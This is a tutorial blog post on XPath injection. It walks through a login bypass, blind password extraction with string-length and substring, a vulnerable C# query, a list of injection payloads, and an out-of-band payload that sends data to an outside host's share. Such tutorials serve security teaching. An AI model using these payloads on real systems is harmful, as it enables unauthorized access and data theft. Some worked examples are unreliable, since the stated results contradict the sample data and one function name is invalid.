XPath Injection

Atharv Sharma
4 min readMar 8, 2022

In this post, we will look at the Injection attack which XPath injection.

First, we must know what is XPath injection attack?

XPath injection attack is like the SQL injection attack in which the website uses user-given information to generate an XPath that will query from XML data. If the website is vulnerable to XPath injection, then we can send our malformed information into the website and access the data or file which normally may not be accessed. We can also see how the XML data is structured.

What is an XML query or XPath?

when we need to access the XML data, we need to send a query to the database which is done with the help of XPath. It is a type of simple descriptive statement that allows the XML query to locate a piece of information. XPath is a standard language; its notation/syntax is always implementation-independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databases. There are no access level permissions, and it is possible to refer to almost any part of an XML document, unlike SQL which allows restrictions on databases, tables, or columns.

XPath Injection

Suppose there is a website that is using the XML data to access the user information and below is the query for the authentication of the user.

<?xml version=”1.0" encoding=”utf-8"?> 
<Employees>
<Employee ID=”1">
<Name>Sam</Name>
<UserName>Johns</UserName>
<Password>This is Secret</Password>
</Employee>
<Employee ID=”2">
<Name>Peter</Name>
<UserName>Pan</UserName>
<Password>Pass</Password>
</Employee>
</Employees>

To get logged in to the website the user must enter the username and password. Then the XPath will generate an XML query to check the credentials that the user entered. The query will look like this:

“//Employee[UserName/text()=’” & Request(“UserName”) & “‘ And Password/text()=’” & Request(“Password”) & “‘]”

Now if we insert our malicious code in the username section then the query which will be generated will be as follows:

Username: test’ or 1=1 or ‘a’=’a 
Password: test
XPath Query:
//Employee[UserName/text() =’test’ or 1=1 or ‘a’=’a’ And Password/text()=’test’]
This is equivalent to:
//Employee[(UserName/text()=’test’ or 1=1) or (‘a’=’a’ And Password/text()=’test’)]

When the query is executed the first part becomes true which is 1=1 and the second part is neglected. The password becomes irrelevant, and the attacker gets unauthorized access to the website.

Blind XPath injection attack.

Blind XPath Injection attacks can be used to extract data from an application that embeds user-supplied data in an unsafe way. This attack is performed when the attacker doesn’t know about the structure of the XML data, or error messages are suppressed and are only able to pull one piece of information at a time by asking true/false questions (booleanized queries), much like Blind SQL Injection.

Blind XPath injection can be mounted by using two methods:
1. Boolenization.
2. XML crawling.

BOOLENIZATION

By using this technique, the attacker can know whether the expression is true or not. Suppose an attacker wants to log in to a website that is vulnerable to blind XPath injection then if the login is successful then it will return “True” and failed log-in will return “False”. In this, a small amount of information is targeted via the analyzed character or number.
When the attacker focuses on a string, they may reveal it in its entirety by checking every single character within the class/range of characters this string belongs to.

Using a string-length(S) function, where S is a string, the attacker may find out the length of this string. With the appropriate number of substring(S,N,1) function iterations, where S is a previously mentioned string, N is a start character, and “1” is a next character counting from N character, the attacker can enumerate the whole string.

Code:
<?xml version=”1.0" encoding=”UTF-8"?>
<data>
<user>
<login>admin</login>
<password>test</password>
<realname>SuperUser</realname>
</user>
<user>
<login>Atharv</login>
<password>12345</password>
<realname>Simple User</realname>
</user>
</data>

Function:

  • string.stringlength(//user\[position()=1\]/child::node()\[position()=2\]) returns the length of the second string of the first user (8),
  • substring((//user\[position()=1\]/child::node()\[position()=2),1,1) returns the first character of this user (‘r’).

XML Crawling

To get to know the XML document structure the attacker may use:

  • count(expression)
count(//user/child::node()

This will return the number of nodes (in this case 2).

  • string-length(string)
string-length(//user[position()=1]/child::node()[position()=2])=6 

Using this query, the attacker will find out if the second string (password) of the first node (user ‘admin’) consists of 6 characters.

  • substring(string, number, number)
substring((//user[position()=1]/child::node()[position()=2]),1,1)="a"

This query will confirm (True) or deny (False) that the first character of the user (‘admin’) password is an “a” character.

If the login form would look like this:

C#:

String FindUser;
FindUser = "//user[login/text()='" + Request("Username") + "' And
password/text()='" + Request("Password") + "']";

then the attacker should inject the following code:

Username: ' or substring((//user[position()=1]/child::node()[position()=2]),1,1)="a" or ''='

The XPath syntax may remind you of common SQL Injection attacks but the attacker must consider that this language disallows commenting out the rest of the expression. To omit this limitation the attacker should use OR expressions to void all expressions, which may disrupt the attack.

Because of Boolenization the number of queries, even within a small XML document, may be extremely high (thousands, hundreds of thousands, and more). That is why this attack is not conducted manually. Knowing a few basic XPath functions, the attacker is able to write an application in a short time which will rebuild the structure of the document and will fill it with data by itself.

Payloads for XPath Injection

Query:

“string(//user[name/text()=’” +vuln_var1+ “‘ and password/text()=’” +vuln_var1+ “‘]/account/text())”

Payloads:

‘ or ‘1’=’1
‘ or ‘’=’
x’ or 1=1 or ‘x’=’y
/
//
//*
*/*
@*
count(/child::node())
x’ or name()=’username’ or ‘x’=’y
‘ and count(/*)=1 and ‘1’=’1
‘ and count(/@*)=1 and ‘1’=’1
‘ and count(/comment())=1 and ‘1’=’1
search=’)] | //user/*[contains(*,’
search=Har’) and contains(../password,’c
search=Har’) and starts-with(../password,’c

Blind Exploitation:

  • Size of a string
and string-length(account)=SIZE_INT
  • Extract a character
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

Out Of Band Exploitation

http://example.com/?title=Foundation&type=*&rent_days=* and doc(‘//10.10.10.10/SHARE’)

Tools for XPath Injection:

References:

  1. OWASP XPath Injection
  2. Payload All Things: XPath Payloads

--

--